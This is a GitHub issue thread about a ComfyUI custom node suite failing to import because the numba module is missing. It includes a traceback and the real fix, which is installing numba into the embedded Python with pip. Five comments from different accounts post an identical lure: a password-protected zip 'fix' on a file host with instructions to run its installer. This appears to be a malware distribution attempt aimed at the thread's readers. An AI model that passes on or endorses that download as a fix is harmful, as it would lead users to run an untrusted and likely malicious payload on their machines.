### ISSUE TITLE
ComfyUI Import Failed for custom nodes - ModuleNotFoundError: No module named 'numba'

### ISSUE THREAD

**Issue by Seek4samurai** [WASasquatch/was-node-suite-comfyui#466]
I've also created a separate enviroment for the custom node to installl deps.
Followed this to install the custom node: https://github.com/WASasquatch/was-node-suite-comfyui?tab=readme-ov-file#recommended-installation

This is something I'm facing since quite a while, I've done some research but nothing seems to work. I've updated deps, created envs for custom nodes & tried a new clean installation as well. I've manually tried installing the numba library as well but still the same issue.

Thanks in advance.

```
C:\Softwares\ComfyUI_windows_portable>run_nvidia_gpu.bat

C:\Softwares\ComfyUI_windows_portable>.\python_embeded\python.exe -s ComfyUI\main.py --windows-standalone-build
Total VRAM 12282 MB, total RAM 31850 MB
pytorch version: 2.3.1+cu121
Set vram state to: NORMAL_VRAM
Device: cuda:0 NVIDIA GeForce RTX 4070 : cudaMallocAsync
Using pytorch cross attention
[Prompt Server] web root: C:\Softwares\ComfyUI_windows_portable\ComfyUI\web
Traceback (most recent call last):
  File "C:\Softwares\ComfyUI_windows_portable\ComfyUI\nodes.py", line 1993, in load_custom_node
    module_spec.loader.exec_module(module)
  File "<frozen importlib._bootstrap_external>", line 940, in exec_module
  File "<frozen importlib._bootstrap>", line 241, in _call_with_frames_removed
  File "C:\Softwares\ComfyUI_windows_portable\ComfyUI\custom_nodes\was-node-suite-comfyui\__init__.py", line 1, in <module>
    from .WAS_Node_Suite import NODE_CLASS_MAPPINGS
  File "C:\Softwares\ComfyUI_windows_portable\ComfyUI\custom_nodes\was-node-suite-comfyui\WAS_Node_Suite.py", line 37, in <module>
    from numba import jit
ModuleNotFoundError: No module named 'numba'

Cannot import C:\Softwares\ComfyUI_windows_portable\ComfyUI\custom_nodes\was-node-suite-comfyui module for custom nodes: No module named 'numba'

Import times for custom nodes:
   0.0 seconds: C:\Softwares\ComfyUI_windows_portable\ComfyUI\custom_nodes\websocket_image_save.py
   0.0 seconds (IMPORT FAILED): C:\Softwares\ComfyUI_windows_portable\ComfyUI\custom_nodes\was-node-suite-comfyui

Starting server

To see the GUI go to: http://127.0.0.1:8188
```

**Comment by MoonShadowIllusion** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by QAQ330** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Shyryp** [comment]
I have the same problem these last few days.

**Comment by WASasquatch** [comment]
Install or upgrade numba `pip install -U numba`

**Comment by Mangaba12000** [comment]
@WASasquatch Hi, same problem here, I already try to apply your suggestion, but says that numba is already installed ou updated:

D:\ComfyUI_windows_portable>pip install -U numba
Requirement already satisfied: numba in c:\users\julianoa\appdata\local\programs\python\python312\lib\site-packages (0.60.0)
Requirement already satisfied: llvmlite<0.44,>=0.43.0dev0 in c:\users\julianoa\appdata\local\programs\python\python312\lib\site-packages (from numba) (0.43.0)
Requirement already satisfied: numpy<2.1,>=1.22 in c:\users\julianoa\appdata\local\programs\python\python312\lib\site-packages (from numba) (2.0.2)
 Any other suggestion?

**Comment by WASasquatch** [comment]
It looks like that is a system level installation. You need to install numba to the venv that ComfyUI runs on.

**Comment by tridashafox** [comment]
This still an issue with the latest install? pip shows numba is installed, and as far as I can tell it does not run in an env.

**Comment by tridashafox** [comment]
the pip install has to happen in the compfyui  local python install namely:  \ComfyUI_windows_portable>.\python_embeded\python.exe -m pip install numba   

This fixes the issue --- Why oh why are are not the custom nodes installing what that need and what is not included with the .\python_embeded\ directory.
